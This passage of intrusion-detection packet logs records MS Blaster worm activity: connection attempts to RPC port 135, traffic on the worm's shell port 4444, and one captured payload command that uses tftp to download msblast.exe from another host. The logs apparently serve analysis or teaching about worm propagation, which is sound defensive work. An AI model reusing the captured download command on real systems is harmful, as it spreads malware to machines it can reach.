TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.488662 137.189.99.200:1090 -> 168.235.185.60:135
TCP TTL:128 TOS:0x0 ID:193 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB85E5D2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.543722 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57052 IpLen:20 DgmLen:40 DF
*****R** Seq: 0xCA1A3C9F Ack: 0xB15C968 Win: 0x0 TcpLen: 20
Worm propagating from a private IP network
08/19-14:00:17.918435 81.50.159.105:58322 -> 192.168.20.2:4444
TCP TTL:108 TOS:0x0 ID:11592 IpLen:20 DgmLen:74 DF
***AP*** Seq: 0xE99DB9C1 Ack: 0x1EDF0906 Win: 0xFAF0 TcpLen: 20
tftp -i 10.1.2.34 GET msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+